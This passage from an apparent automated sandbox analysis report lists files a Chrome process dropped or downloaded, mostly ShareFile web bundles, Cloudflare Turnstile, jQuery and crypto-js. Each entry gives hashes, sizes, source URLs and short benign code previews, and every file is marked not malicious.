                                                                        Preview:L..................F.@.. ...$+.,....\.~.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y`............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............na.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 19:18:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2679
                                                                        Entropy (8bit):3.9956325682650213
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A24FB342E44F789830F48A5654945664
                                                                        SHA1:7D96C2581C422075A31B0C7A5B974CC4987E1CA9
                                                                        SHA-256:C2B1B613E06C5DB6E4EBC9E8400B84C79A91885764CDC8E18A8C6ADEC8108865
                                                                        SHA-512:AB19F067CBC52052431CEFAF6821E0A76AA61FC3DD73B8A5B8452E0DFFCCB872BCBAA53629A7A5719B63D64CD21242F771F5D65263F2A83BA0D772825DC09B47
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....&f.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y`............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............na.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65473)
                                                                        Category:dropped
                                                                        Size (bytes):76545
                                                                        Entropy (8bit):5.22572042069779
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:02E3F0E08CEFDB98ED2A52D58EAC49AC
                                                                        SHA1:216091372CEAF38DA058315BF860C39AD7A0055A
                                                                        SHA-256:83C82065AE98F33C6EBFB5AB74862FEF808B78ED1391EF1B670D60CE4B9CC63A
                                                                        SHA-512:C1C18FEEC5B71871809EE0C67909C74CB5310C4E63152B3F4BE1B85CC3621B99A49661F0E3DD120FF92243708D93D399EDEABF3EAD990B7090889F057D657968
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};return Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(t){n.Api=t.Api,n.ItemsEntity=t.ItemsEntity,n.Uploader=t.Uploader,n.UsersEntity=t.UsersEntity,n.ZoneService=t.ZoneService,n.createFile=t.createFile},function(t){r.sizes=t.sizes},function(t){i.Badge=t.Badge,i.Button=t.Button,i.Flex=t.Flex,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Typography=t.Typography,i.theme=t.theme},function(t){Object.keys(t).forEach((function(e){s[e]=t[e]}))},function(t){a["default"]=t["default"],a.findDOMNode=t.findDOMNode,a.flushSync=t.flushSync},function(t){o.useHistory=t.useHistory},function(t){u.Link=t.Link,u.useHistory=t.useHistory},function(t){c.__awaiter=t.__awaiter,c.__rest=t.__rest}],execute:function(){t((()=>{var t,l,d={9461:(t,e,n)=>{
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65472)
                                                                        Category:dropped
                                                                        Size (bytes):113304
                                                                        Entropy (8bit):5.351512714972175
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:530A7B55C7F2519E38F8B06FE7B2AB6D
                                                                        SHA1:792B4A21E3F0A3CC0AFB3F0D5AE0C9BD4D686697
                                                                        SHA-256:F764709D6B4455A16AB263B1963537EEBE306D4B2B38430A3205EDE496610B4D
                                                                        SHA-512:1B7B00D586F840DD17EC225D5BAD62293B926CA173AB9534F7A4DDB44EFB5A89E1A29EB6CD0DBA17A051DC16BF1D519469A21050DA28E4A46748BA7AE1AEC60E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{}).System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Button=e.Button,r.DatePicker=e.DatePicker,r.Form=e.Form,r.Input=e.Input,r.Space=e.Space,r.Spin=e.Spin,r.notification=e.notification},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,i,a,s,c={4386:(e,t,r)=>{"use strict";r.d(t,{j:()=>u});var n=r(8109);function o(e){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},o(e)}function i(){i=function(){return t};var e,t={},r=Object.prototype,n=r.hasOwnProperty,a=Object.defineProperty||function(e,t,r){e[t]=r.value},s="function"==typeof Symbol?Symbol:{},c=s.iterator||"@@iterator",u=s.asyncIte
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (44174)
                                                                        Category:downloaded
                                                                        Size (bytes):44175
                                                                        Entropy (8bit):5.377219977973567
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:66E93C1F0C53BB0A4A34C2BE54427E6C
                                                                        SHA1:24346C2941C3D92C9F3634FC594079F4706650F7
                                                                        SHA-256:CE9B46C18D0769C78A7E889EB237606CB96B602061B39B4C1159A22A015B51DF
                                                                        SHA-512:30E800EAA414A0F571E5100B71B19AC23743814A8FD2B7C991DA97FEA844B18F4EF64FC4AA90C3C300CC94F6FF47EA201E410F19F80CEE84D2E307AAA10EF1DE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/769ce3c24a3b/api.js
                                                                        Preview:"use strict";(function(){function Rt(e,n,r,o,c,u,y){try{var _=e[u](y),d=_.value}catch(p){r(p);return}_.done?n(d):Promise.resolve(d).then(o,c)}function It(e){return function(){var n=this,r=arguments;return new Promise(function(o,c){var u=e.apply(n,r);function y(d){Rt(u,o,c,y,_,"next",d)}function _(d){Rt(u,o,c,y,_,"throw",d)}y(void 0)})}}function F(e,n){return n!=null&&typeof Symbol!="undefined"&&n[Symbol.hasInstance]?!!n[Symbol.hasInstance](e):F(e,n)}function Ie(e,n,r){return n in e?Object.defineProperty(e,n,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[n]=r,e}function Oe(e){for(var n=1;n<arguments.length;n++){var r=arguments[n]!=null?arguments[n]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Ie(e,c,r[c])})}return e}function gr(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65474)
                                                                        Category:downloaded
                                                                        Size (bytes):199202
                                                                        Entropy (8bit):5.36124176392545
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C15AD02B2FF2D58EEB36FC0E8D541838
                                                                        SHA1:1E56E1FAE6B8F5EBC0EA797BBF25A8E120DC324D
                                                                        SHA-256:C576676DCD5F1A8D00B28E43C6860855058DDEBF4F2DF2B8E105DFC64B03347A
                                                                        SHA-512:8F66B9699E69355932C150C0C14FB5DD55EEAB09FF8798F935EEBC36AF5A455DB01750A447EA2B1E262768E8891C06F610568B993E8B28D004653B391C75FF3C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.56.0/package/dist/index.js
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AntDConfigProvider=e.AntDConfigProvider,n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Image=e.Image,r.Layout=e.Layout,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=>{var e,s,u,c,l={439:(e,t,n)=>{"use strict";n.d(t,{z1:()=>k,cM:()=>y});var r=n(2456),o=n(6250),i=2,a=.16,s=.05,u=.05,c=.15,l=5,f=4,d=[{index:7,opacity:.15},{index:6,opacity:.25},{ind
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):47992
                                                                        Entropy (8bit):5.605846858683577
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65475)
                                                                        Category:dropped
                                                                        Size (bytes):90534
                                                                        Entropy (8bit):5.296994702432963
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EA7390FE17C995BA1B39321CAF36B075
                                                                        SHA1:5183F6AB2CE1A9D16A13DCBD7F93125684F542C8
                                                                        SHA-256:621FDDD5DF3BF3867273F958878A735C0EAA84FDE06C417DE72FA71A8E18C447
                                                                        SHA-512:70B10FD2BCA0A38D0B6070109AFE26EADB6F0BCFA65FDE87AE9B38A59A82E07E6C5F072047E503F55493C5542FA1703B3D9581ABB38825ED0DCB1050F0A613FF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Avatar=e.Avatar,o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Collapse=e.Collapse,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.Layout=e.Layout,o.Menu=e.Menu,o.Modal=e.Modal,o.Popconfirm=e.Popconfirm,o.Row=e.Row,o.Select=e.Select,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.notification=e.notification},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a["defau
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:downloaded
                                                                        Size (bytes):20
                                                                        Entropy (8bit):3.446439344671015
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                        SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                        SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                        SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://api.ipify.org/?format=json
                                                                        Preview:{"ip":"8.46.123.33"}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65252)
                                                                        Category:dropped
                                                                        Size (bytes):1911309
                                                                        Entropy (8bit):5.617935993711081
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EAE6DD34531FECBF591CF8D4FF3E01B0
                                                                        SHA1:E15DFF058693275E2E6E42DD220A7DFE05DA4FEE
                                                                        SHA-256:271489A778859C48284E43C352D1EF55DB50CBD75780FF88B11A879E5B13427E
                                                                        SHA-512:911D06AA97E589013CDC8877319DA238B2CC9EFFD3FF4A682E9A697051CC9A0F105154BCC2AD32E7B76D543162541998AA4EBDCE02F298CCC63B93A467095E61
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_MODULE__4634__={},__WEBPACK_EXTERNAL_MODULE__4876__={},__WEBPACK_EXTERNAL_MODULE__4726__={},__WEBPACK_EXTERNAL_MODULE__1867__={},__WEBPACK_EXTERNAL_MODULE__2965__={},__WEBPACK_EXTERNAL_MODULE__8109__={};return Object.defineProperty(__WEBPACK_EXTERNAL_MODULE__4726__,"__esModule",{value:!0}),{setters:[function(e){__WEBPACK_EXTERNAL_MODULE__4634__.colorPalette=e.colorPalette,__WEBPACK_EXTERNAL_MODULE__4634__.sizes=e.sizes},function(e){__WEBPACK_EXTERNAL_MODULE__4876__.Alert=e.Alert,__WEBPACK_EXTERNAL_MODULE__4876__.Avatar=e.Avatar,__WEBPACK_EXTERNAL_MODULE__4876__.Button=e.Button,__WEBPACK_EXTERNAL_MODULE__4876__.Card=e.Card,__WEBPACK_EXTERNAL_MODULE__4876__.Checkbox=e.Checkbox,__WEBPACK_EXTERNAL_MODULE__4876__.Col=e.Col,__WEBPACK_EXTERNAL_MODULE__4876__.Di
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65481)
                                                                        Category:dropped
                                                                        Size (bytes):858362
                                                                        Entropy (8bit):5.692880054506936
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DC9D1A8AEE42E5B9963CA1CD7D2F3F45
                                                                        SHA1:DB04EEE5F399F88427FF99E6FCB03F1082A0E6EA
                                                                        SHA-256:0DA9F1485495F08758E89EB5D667398570620DAF512F359602FACA7091530B04
                                                                        SHA-512:AE5408757860A678D517984A4FB4B682C5A1EAD928071633ECCD4AD5377412DB8FD3C805F50AD923D18F14CE4875CB9BC1637FD3EDE31C8DB81F0C866E9B9F7D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},r={},o={},a={},s={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){i.Alert=e.Alert,i.Avatar=e.Avatar,i.Button=e.Button,i.Card=e.Card,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Collapse=e.Collapse,i.ConfigProvider=e.ConfigProvider,i.DatePicker=e.DatePicker,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Dropdown=e.Dropdown,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Input=e.Input,i.Layout=e.Layout,i.List=e.List,i.Modal=e.Modal,i.Pagination=e.Pagination,i.Progress=e.Progress,i.Result=e.Result,i.Row=e.Row,i.Select=e.Select,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Steps=e.Steps,i.Tabs=e.Tabs,i.Tag=e.Tag,i.Tooltip=e.Tooltip,i.Typography=e.Typography,i.Upload=e.Upload,i.notification=e.notification,i.theme=e.theme},function(e
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65447)
                                                                        Category:downloaded
                                                                        Size (bytes):89501
                                                                        Entropy (8bit):5.289893677458563
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1456)
                                                                        Category:downloaded
                                                                        Size (bytes):1492
                                                                        Entropy (8bit):5.158827164846835
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F17CADE455C1E9DF4641950A02B898EC
                                                                        SHA1:416716233F1A8EA7201A7DC0F218178516CC0E37
                                                                        SHA-256:06D24BF97F48A83E5D0AA3C508620BA5BEC38AD6959626CD1BA631D1C9520914
                                                                        SHA-512:D2D557FAE36537BE89518AF4A0608FAFB4B92CAEA3CED070C2AA693EB51E606D865932823C56D90423DB8217353C9166FC77732201364AFA3F76D7DA5731C56A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.238.0/package/dist/main.css
                                                                        Preview:@font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:300;src:url(402b74053d26323596b3.woff2) format("woff2"),url(822249fd1980c2cf76d8.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-weight:300;src:url(d539f1e6177630654d7a.woff2) format("woff2"),url(03d1fbfb34140c8b62bb.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:400;src:url(af15e31c70fab7cfd55c.woff2) format("woff2"),url(4d713186ee128a842a8a.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-weight:400;src:url(f1e72df265e116587589.woff2) format("woff2"),url(0e2359dcf69d17da12a3.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:500;src:url(91306a69f84f808e9310.woff2) format("woff2"),url(6eea0c96234d4e052d5a.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-weight:500;src:ur
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 56 x 15, 8-bit/color RGB, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):61
                                                                        Entropy (8bit):4.035372245524404
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4D62EDB750F01270CCD2C6B52F515B70
                                                                        SHA1:039DA262A8BB70CF7137325E6F3DEA0BC0BD6F6A
                                                                        SHA-256:C48988EE1E6C58285616950174D32C5AF68F7598610A88A3A05B0335A6037A73
                                                                        SHA-512:69C1578DB9A227C8886A4D661796027680ADA61CD9DDE9AF2674903C4B008E27AC7B3FBD0948485A12B4E05C380997466E052D741FFD025A046852CBC49424D8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8b2329bde9cc9e16/1723493996924/vcC1gyTyO0aNIYw
                                                                        Preview:.PNG........IHDR...8.........>..\....IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65479)
                                                                        Category:dropped
                                                                        Size (bytes):260457
                                                                        Entropy (8bit):5.3275572069546495
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:38905A986E115428914EA1F21E955C5F
                                                                        SHA1:7C0549A822A3906ACA3CC6C55818BE270BBC0466
                                                                        SHA-256:60FFD5F539D5DFCB682614AB283F2F58FB661ECD6E59D16781BC1906F796B286
                                                                        SHA-512:A02E1C588C54F6B9BC3ABF3410EDB1717FABFA991BFF93BBB97EF84E0ED1855E46CA55E4C090E3F7827819D9A6C6663A608F9275BC8F9C8009C681C1B1CA1496
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.App=e.App,r.Button=e.Button,r.Carousel=e.Carousel,r.Checkbox=e.Checkbox,r.Col=e.Col,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Flex=e.Flex,r.Form=e.Form,r.Grid=e.Grid,r.Image=e.Image,r.Input=e.Input,r.Layout=e.Layout,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tag=e.Tag,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){o.createPortal=e.createPortal,o["default"]=e["default"],o.flushSync=e.flushSync,o.uns
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):61
                                                                        Entropy (8bit):3.990210155325004
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65475)
                                                                        Category:dropped
                                                                        Size (bytes):296180
                                                                        Entropy (8bit):5.555910566916461
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:93156B7B18BC3CD821AE1BEFD01B63C9
                                                                        SHA1:D0CDBA00A3A91BC9319F5D2C111E5105497C9D58
                                                                        SHA-256:0B4E907EF0BA976EFEC7EAEF06D108590E7E110B070FF28A1FD281492DB4C75C
                                                                        SHA-512:8B9834E1F4B3D2E38D4AA3FE508EB3E9CEAB54A188EC5150974A06A94E685829C1CA22B5C5B5297D14D32F641DE907A7B5307F5053A9AAD618915714296247EE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},c={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.BundleType=e.BundleType,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):787206
                                                                        Entropy (8bit):5.6102353202426825
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AB9505B1406EF12434D0D3347561EB0F
